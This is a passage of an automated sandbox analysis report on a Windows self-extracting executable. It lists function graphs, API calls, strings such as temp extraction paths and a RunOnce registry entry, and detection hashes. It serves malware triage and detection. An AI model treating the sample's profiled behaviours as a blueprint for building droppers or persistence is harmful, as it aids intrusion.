7ff776d13344-7ff776d13362 call 7ff776d14f2c call 7ff776d17958 522->525 526 7ff776d1345f-7ff776d13467 523->526 527 7ff776d133cf-7ff776d133d6 523->527 528 7ff776d1338c-7ff776d1339c call 7ff776d16f14 524->528 529 7ff776d1333f 524->529 525->506 530 7ff776d13469-7ff776d1346b 526->530 531 7ff776d1347b 526->531 532 7ff776d133db-7ff776d133e9 527->532 539 7ff776d133a1-7ff776d133a3 528->539 529->525 530->531 535 7ff776d1346d-7ff776d13474 call 7ff776d123c0 530->535 538 7ff776d1347d-7ff776d1348b 531->538 532->532 536 7ff776d133eb-7ff776d133f2 532->536 548 7ff776d13479 535->548 541 7ff776d1342d call 7ff776d15f80 536->541 542 7ff776d133f4-7ff776d133fb 536->542 544 7ff776d134a8-7ff776d134af 538->544 545 7ff776d1348d-7ff776d13493 538->545 539->506 539->519 555 7ff776d13432 541->555 542->541 549 7ff776d133fd-7ff776d1342b call 7ff776d17d28 542->549 546 7ff776d134ba-7ff776d134bf 544->546 547 7ff776d134b1-7ff776d134b3 544->547 545->544 552 7ff776d13495 call 7ff776d141b4 545->552 546->510 547->546 553 7ff776d134b5 call 7ff776d14a54 547->553 548->538 559 7ff776d13434 549->559 560 7ff776d1349a-7ff776d1349c 552->560 553->546 555->559 561 7ff776d13445-7ff776d13453 call 7ff776d17984 559->561 562 7ff776d13436-7ff776d13440 559->562 560->506 563 7ff776d134a2 560->563 561->506 566 7ff776d13459 561->566 562->506 563->544 566->526
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: DirectoryLibrary$AddressAllocDecryptFileFreeLoadLocalProcSystemWindows
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                              • API String ID: 3010855178-3008067379
                              • Opcode ID: 17473aa00d8fc118e200a44bf9feefbc95b8e526729a92400f5d85c7f6321eab
                              • Instruction ID: eb23723e258e96127671c68c3a969d9067661172455e7fbcf59f300f428e6493
                              • Opcode Fuzzy Hash: 17473aa00d8fc118e200a44bf9feefbc95b8e526729a92400f5d85c7f6321eab
                              • Instruction Fuzzy Hash: 15714CE3E7C64286FE68BB34EC50277E691AF85340FC34835D94D46299DFECE9458620
                              Function 00007FF776D16710 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 121COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 567 7ff776d16710-7ff776d1673c 568 7ff776d1680b-7ff776d1681a 567->568 569 7ff776d16742-7ff776d16747 call 7ff776d165a8 567->569 570 7ff776d1681d-7ff776d16827 568->570 572 7ff776d1674c-7ff776d1674e 569->572 573 7ff776d16829-7ff776d1682f 570->573 574 7ff776d1683c-7ff776d16847 570->574 575 7ff776d168c0 572->575 576 7ff776d16754-7ff776d1676a 572->576 573->574 577 7ff776d16831-7ff776d1683a 573->577 578 7ff776d1684a-7ff776d16854 call 7ff776d16d9c 574->578 580 7ff776d168c2-7ff776d168e6 call 7ff776d186f0 575->580 579 7ff776d1676d-7ff776d16777 576->579 577->570 577->574 590 7ff776d16875-7ff776d1687d call 7ff776d16f14 578->590 591 7ff776d16856-7ff776d16869 CreateDirectoryA 578->591 582 7ff776d16779-7ff776d1677f 579->582 583 7ff776d1678c-7ff776d167a1 579->583 582->583 586 7ff776d16781-7ff776d1678a 582->586 587 7ff776d167f8-7ff776d16809 call 7ff776d17e08 583->587 588 7ff776d167a3-7ff776d167bb GetSystemInfo 583->588 586->579 586->583 587->578 593 7ff776d167e7 588->593 594 7ff776d167bd-7ff776d167c0 588->594 603 7ff776d16882-7ff776d16884 590->603 595 7ff776d1686b 591->595 596 7ff776d16894-7ff776d1689f call 7ff776d17958 591->596 602 7ff776d167ee-7ff776d167f3 call 7ff776d17e08 593->602 600 7ff776d167de-7ff776d167e5 594->600 601 7ff776d167c2-7ff776d167c5 594->601 595->590 596->575 600->602 607 7ff776d167c7-7ff776d167ca 601->607 608 7ff776d167d5-7ff776d167dc 601->608 602->587 604 7ff776d168a1-7ff776d168a8 603->604 605 7ff776d16886-7ff776d16892 603->605 604->575 610 7ff776d168aa-7ff776d168bb RemoveDirectoryA 604->610 605->580 607->587 611 7ff776d167cc-7ff776d167d3 607->611 608->602 610->575 611->602
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                              • API String ID: 1979080616-1381881128
                              • Opcode ID: 9a704cb3954627d09357b10cbec955ccf424cbd9ff52b3ee53e2929f97512051
                              • Instruction ID: 4f186ec59e73cc45615f2d1fb7ab1f8bebe6bafdc5e92c298375bc9d2fedd7bc
                              • Opcode Fuzzy Hash: 9a704cb3954627d09357b10cbec955ccf424cbd9ff52b3ee53e2929f97512051
                              • Instruction Fuzzy Hash: FA5186E3F3C68285FE18AB759C102B7E7A1AF45740FDA4836C94D52699CFBDE905C220
                              Function 00007FF776D12D97 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 74libraryloadershutdownCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: Handle$AddressCloseExitModuleProcWindows
                              • String ID: @$HeapSetInformation$Kernel32.dll
                              • API String ID: 504435289-1204263913
                              • Opcode ID: 315c05e03fe2e12ab647ef50a7f1a45fa091bbd284ff65291a409f08e8d1d3bb
                              • Instruction ID: b46ec314cbb2e7a662d67a40b4cc7d8b8fac38d88f4c1bc8d88447eda7edf13c
                              • Opcode Fuzzy Hash: 315c05e03fe2e12ab647ef50a7f1a45fa091bbd284ff65291a409f08e8d1d3bb
                              • Instruction Fuzzy Hash: F1314FE3E3C24286FF6C7B70AC51277E691AF49740FC64835D50D4229DEFEDA5848620
                              Function 00007FF776D12034 Relevance: 12.1, APIs: 8, Instructions: 121filestringCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                              • String ID:
                              • API String ID: 836429354-0
                              • Opcode ID: 91cc5e1a10547be1af5b881470c4a552975bb6d87df7be44110ed190adb22146
                              • Instruction ID: b64c2e15bda4084bf1dd0859022c24eb7028bf2e8c5d2084058eb7e4abc3c24b
                              • Opcode Fuzzy Hash: 91cc5e1a10547be1af5b881470c4a552975bb6d87df7be44110ed190adb22146
                              • Instruction Fuzzy Hash: 3A517FA363C68685EF15AF31DC002EAA7A1FB45B84FC58971DA1D07688DF7DD949C320
                              Function 00007FF776D18A1E Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: ExceptionFilterUnhandled
                              • String ID:
                              • API String ID: 3192549508-0
                              • Opcode ID: 31ba59d9759834a282d63e6df2edccb489d5ae17e54cd4dbc75f9f5da0e92170
                              • Instruction ID: a76db949a9941d3cf9fee11aa5ea01341f91a68b5aeab352021b66a3a3d23df3
                              • Opcode Fuzzy Hash: 31ba59d9759834a282d63e6df2edccb489d5ae17e54cd4dbc75f9f5da0e92170
                              • Instruction Fuzzy Hash: BDB09B4763758241D90567B54D4904516411B4A5347C91974862885954D55C91594614
                              Function 00007FF776D163DC Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 97registryfileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: DeleteFileFreeLocal$AttributesCloseCurrentDirectoryOpenValue
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                              • API String ID: 3049360512-2700888539
                              • Opcode ID: 412a7dec44b3798a2430baef0d9910c820e9379bb72a94b578006faa3a53e04f
                              • Instruction ID: 6b2a9ae8cd8aef67c97dff84708e0ff067edfd2a7d4de253115cfc6de1e1a0c8
                              • Opcode Fuzzy Hash: 412a7dec44b3798a2430baef0d9910c820e9379bb72a94b578006faa3a53e04f
                              • Instruction Fuzzy Hash: 7F514FA2A3C68286FF18AB70EC1437AF7A1FB45741FC64531D54D06299DFACD444C720
                              Function 00007FF776D14838 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 119processsynchronizationCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: CloseHandleProcess$CodeCreateExitObjectSingleWait
                              • String ID:
                              • API String ID: 976364251-3916222277
                              • Opcode ID: 16e7ca118e12b91407658261034ebca13a8d1872c09417475df138d405b27805
                              • Instruction ID: 1e8c1ef2777099a748419274ce9e52034216a15c6e8b093d5ddcfdcdd957a202
                              • Opcode Fuzzy Hash: 16e7ca118e12b91407658261034ebca13a8d1872c09417475df138d405b27805
                              • Instruction Fuzzy Hash: 12517EB393C64186FF68AB30E86437AF7A1EB88755F824534E58D46698DFBCD4488B10
                              Function 00007FF776D165A8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 88fileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: File$Directory$AttributesCreateDeleteNameRemoveTemp
                              • String ID: IXP$IXP%03d.TMP
                              • API String ID: 4001122843-3932986939
                              • Opcode ID: 1494c94e7564b1c50e09bb3893207fb05a2ef390ee72dbbb783d5dfbcc99321d
                              • Instruction ID: 6a19cdf78c7c2e560d084aef4733b92a64472b1cd109365f2d2771f747061c49
                              • Opcode Fuzzy Hash: 1494c94e7564b1c50e09bb3893207fb05a2ef390ee72dbbb783d5dfbcc99321d
                              • Instruction Fuzzy Hash: 943195B273C68186EE18AB61AC502BAB692FB89B80FC68531DD4D47799CF7CD805C610
                              Function 00007FF776D16294 Relevance: 12.1, APIs: 5, Strings: 3, Instructions: 75memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                                • Part of subcall function 00007FF776D151F8: FindResourceA.KERNEL32(?,?,00000000,00007FF776D12F6B), ref: 00007FF776D15220
                                • Part of subcall function 00007FF776D151F8: SizeofResource.KERNEL32(?,?,00000000,00007FF776D12F6B), ref: 00007FF776D15231
                                • Part of subcall function 00007FF776D151F8: FindResourceA.KERNEL32(?,?,00000000,00007FF776D12F6B), ref: 00007FF776D15257
                                • Part of subcall function 00007FF776D151F8: LoadResource.KERNEL32(?,?,00000000,00007FF776D12F6B), ref: 00007FF776D15268
                                • Part of subcall function 00007FF776D151F8: LockResource.KERNEL32(?,?,00000000,00007FF776D12F6B), ref: 00007FF776D15277
                                • Part of subcall function 00007FF776D151F8: memcpy_s.MSVCRT ref: 00007FF776D15296
                                • Part of subcall function 00007FF776D151F8: FreeResource.KERNEL32(?,?,00000000,00007FF776D12F6B), ref: 00007FF776D152A5
                              • LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF776D1324B), ref: 00007FF776D162B9
                              • LocalFree.KERNEL32 ref: 00007FF776D16332
                                • Part of subcall function 00007FF776D17958: GetLastError.KERNEL32 ref: 00007FF776D1795C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: Resource$FindFreeLocal$AllocErrorLastLoadLockSizeofmemcpy_s
                              • String ID: $<None>$UPROMPT
                              • API String ID: 2171764859-2569542085
                              • Opcode ID: bce953315df2136bd9c83a7e38e7c9bcfbdf6b05f60fc9f9bc5cb1955f243e78
                              • Instruction ID: 35ebb44a1d57c2e9e6d3abb39ef0f59ecebbeb737599077d0e894b06a36cef42
                              • Opcode Fuzzy Hash: bce953315df2136bd9c83a7e38e7c9bcfbdf6b05f60fc9f9bc5cb1955f243e78
                              • Instruction Fuzzy Hash: CF31E4B3A3C24287FF286B70AD5077BFA52EB85385F825835DA0D06699DFBCD4058B10
                              Function 00007FF776D155C0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 164filestringCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: CreateFile$lstrcmp
                              • String ID: *MEMCAB
                              • API String ID: 1301100335-3211172518
                              • Opcode ID: a2c1f66350d6024a7f804a88bc9b7da19f54bdbcb5e3280bfb267e90ce3ff26c
                              • Instruction ID: 52bb528b37309f499655a2b1ba7b89ff43e30ed461cd53dd577f308e2dcb0f6e
                              • Opcode Fuzzy Hash: a2c1f66350d6024a7f804a88bc9b7da19f54bdbcb5e3280bfb267e90ce3ff26c
                              • Instruction Fuzzy Hash: A861C9E3E3C74586FF649B28A88537AB691E745B64F858731CA6D027C8DFBCA405C620
                              Function 00007FF776D15AF1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 124timeCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: FileTime$AttributesDateItemLocalText
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                              • API String ID: 851750970-4151094324
                              • Opcode ID: caf4f2272670990647462f14bfaf3187ac79d74cb37a0834bbd78866cb2a2d6f
                              • Instruction ID: b6e56fc7e5b4c88bc65ce5dd492c453b51f8d2f5394bf7e9dc0c3d77a5a96dbe
                              • Opcode Fuzzy Hash: caf4f2272670990647462f14bfaf3187ac79d74cb37a0834bbd78866cb2a2d6f
                              • Instruction Fuzzy Hash: 61517FE3A3C54681EE68AF35DC102BBA361FB84B54F864A31D91E43298CEBCD441C760
                              Function 00007FF776D16D9C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: AllocLocal
                              • String ID: TMP4351$.TMP
                              • API String ID: 3494564517-2619824408
                              • Opcode ID: c1b35bc8c47e3fa721962d77e49ea3aed5ba0491a04cdd1077e5237b6c9beade
                              • Instruction ID: f6fc8b0e309c33f64ef9ef4df12c0d3ad0b346743ed8de8803be89b0fa5f6d7f
                              • Opcode Fuzzy Hash: c1b35bc8c47e3fa721962d77e49ea3aed5ba0491a04cdd1077e5237b6c9beade
                              • Instruction Fuzzy Hash: D541C4A3A3C68186FF145B70AC103BAAA91EB85B60F994734DA5D077D9DFBCD4058710
                              Function 00007FF776D123C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 47registryCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: CloseOpenQueryValue
                              • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager
                              • API String ID: 3677997916-3057196482
                              • Opcode ID: 77884732b6fcd1747e8343cb64de736ba457f33871a5df5b0c6efdeb408ada0e
                              • Instruction ID: af53bf1b070a7db2ad5b395d3b55b816e2e5752d74290faa3c8795fb7186064a
                              • Opcode Fuzzy Hash: 77884732b6fcd1747e8343cb64de736ba457f33871a5df5b0c6efdeb408ada0e
                              • Instruction Fuzzy Hash: F1119073A3C742C7EF14AB24E84017BE6A0FB99350F820535DA8D0275CEF6DD4808A20
                              Function 00007FF776D184F1 Relevance: 3.1, APIs: 2, Instructions: 71COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b353934a75947262ca4df866a86f568bd935b38d5a17514c75cf9020de9246fa
                              • Instruction ID: 93a3daf352032e9571783cb75ec262c7d88be4989c08e117abb74874ca586b30
                              • Opcode Fuzzy Hash: b353934a75947262ca4df866a86f568bd935b38d5a17514c75cf9020de9246fa
                              • Instruction Fuzzy Hash: F43121B3A3C60685FE68EB31ED50377A3A1FB44794FC60831D94E87258DEBDE8418661
                              Function 00007FF776D18460 Relevance: 3.1, APIs: 2, Instructions: 60COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00007FF776D18BF4: GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF776D18C24
                                • Part of subcall function 00007FF776D18BF4: GetCurrentProcessId.KERNEL32 ref: 00007FF776D18C32
                                • Part of subcall function 00007FF776D18BF4: GetCurrentThreadId.KERNEL32 ref: 00007FF776D18C3E
                                • Part of subcall function 00007FF776D18BF4: GetTickCount.KERNEL32 ref: 00007FF776D18C4A
                                • Part of subcall function 00007FF776D18BF4: GetTickCount.KERNEL32 ref: 00007FF776D18C5A
                                • Part of subcall function 00007FF776D18BF4: QueryPerformanceCounter.KERNEL32 ref: 00007FF776D18C75
                              • GetStartupInfoW.KERNEL32 ref: 00007FF776D18495
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: CountCurrentTickTime$CounterFileInfoPerformanceProcessQueryStartupSystemThread
                              • String ID:
                              • API String ID: 1911256751-0
                              • Opcode ID: 347b0333a3a1d893c94d85d6fddf58f5e1ebc279543ebfd34131ef946fb76677
                              • Instruction ID: 316bc87aa6e622633b4a6c3a36cbb20d51666447f031521515d3364093f196da
                              • Opcode Fuzzy Hash: 347b0333a3a1d893c94d85d6fddf58f5e1ebc279543ebfd34131ef946fb76677
                              • Instruction Fuzzy Hash: 772141B3A3C64686FF68EB31EC40377A6E5FB45754FD60830D94D82299CFACE4418A21
                              Function 00007FF776D158D0 Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00007FF776D13C80: MsgWaitForMultipleObjects.USER32(?,?,?,?,?,?,?,?,?,00000001,00007FF776D13B49), ref: 00007FF776D13CA4
                                • Part of subcall function 00007FF776D13C80: PeekMessageA.USER32 ref: 00007FF776D13CC9
                                • Part of subcall function 00007FF776D13C80: PeekMessageA.USER32 ref: 00007FF776D13D0D
                              • WriteFile.KERNELBASE ref: 00007FF776D15924
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                              • String ID:
                              • API String ID: 1084409-0
                              • Opcode ID: df09df05b6a8f76d98ff4e568d39aff5741097c23a6c3239c69c04500cd56e3d
                              • Instruction ID: 2d317a24071ea2e2a4fc632056cd166da23e5221ec5f7c0fcf2f208a40a38d92
                              • Opcode Fuzzy Hash: df09df05b6a8f76d98ff4e568d39aff5741097c23a6c3239c69c04500cd56e3d
                              • Instruction Fuzzy Hash: E22160E2A3C54186EE189F39EC54336E761BF857A4F954A34D95C0A69CCFBCD405CB10
                              Function 00007FF776D153B8 Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                              Download Yara Rule
                              APIs
                              • GetFileAttributesA.KERNELBASE ref: 00007FF776D153C5
